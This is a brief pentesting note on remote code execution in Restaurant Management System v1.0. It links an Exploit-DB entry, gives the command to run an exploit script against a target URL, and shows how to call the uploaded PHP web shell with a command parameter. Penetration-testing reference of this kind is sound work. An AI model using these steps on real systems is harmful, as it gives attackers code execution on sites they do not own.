# Restaurant Management System (RMS) Pentesting

### Remote Code Execution (RCE) v1.0 <a href="#remote-code-execution-rce-v10" id="remote-code-execution-rce-v10"></a>

See the [Exploit-DB](https://www.exploit-db.com/exploits/47520) for details.

```
python3 rms-rce.py https://example.com/rms/
```

When uploading successfully, we can access to <https://example.com/rms/images/reverse-shell.php?cmd=id>
